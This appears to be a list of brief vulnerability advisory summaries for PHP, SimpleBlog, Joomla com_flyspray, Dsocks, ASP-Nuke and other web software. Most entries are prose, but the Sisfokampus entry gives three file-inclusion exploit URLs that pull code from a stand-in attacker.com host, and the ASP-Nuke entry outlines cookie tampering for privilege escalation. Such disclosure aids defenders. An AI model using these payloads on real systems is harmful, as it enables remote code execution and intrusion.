A Denial of Service (DoS) vulnerability exists in the htmlentities() method of PHP due to a bug in the UTF-8 character encoding. The vulnerability is triggered when a string of 64 or more Greek Theta characters (U+03B8) is passed to the htmlentities() method. This causes the method to assume that the string is only 8 characters long, resulting in a buffer overflow and a DoS condition.
A remote SQL injection vulnerability exists in SimpleBlog version 2.3. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the application's database and potentially execute arbitrary code.
A vulnerability in the Joomla com_flyspray component allows an attacker to read any file on the server, including the configuration file. This is due to the lack of sanitization of the 'file' parameter in the startdown.php file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server.
A remote SQL injection vulnerability exists in Admin Hacks List v1.20. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database.
Exhibit Engine version 1.22 and prior is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability to include arbitrary files from remote locations by manipulating the 'toroot' parameter in the 'styles.php' script.
Dsocks is prone to a remote buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. An attacker may exploit this vulnerability to execute arbitrary code in the context of the user running the application or to crash the application, resulting in denial-of-service conditions.
A vulnerability in ASP-Nuke Community version 1.5 allows an attacker to modify the cookie information and gain access to the system with escalated privileges. By opening the Cookie Editor, the attacker can find cookie information and change the pseudoname, pseudo, pseudoid, and email fields. After saving the changes, the attacker can go to the default.asp page and gain access to the system with escalated privileges.
A vulnerability exists in basicforum v 1.1 (edit.asp) which allows remote attackers to inject arbitrary SQL commands via the 'type' and 'id' parameters. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can result in the compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Sisfokampus 0.8 is vulnerable to Local File Include vulnerability. This vulnerability can be exploited by an attacker to include malicious files from a remote server. The vulnerable files are index.php, print.php and download.php. The exploit for index.php is http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?. The exploit for print.php is http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?. The exploit for download.php is http://www.victim.com/download.php?dir=http://attacker.com/evilcode.txt?.
Liberum Help Desk version 0.97.3 and prior is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.
Services By CQR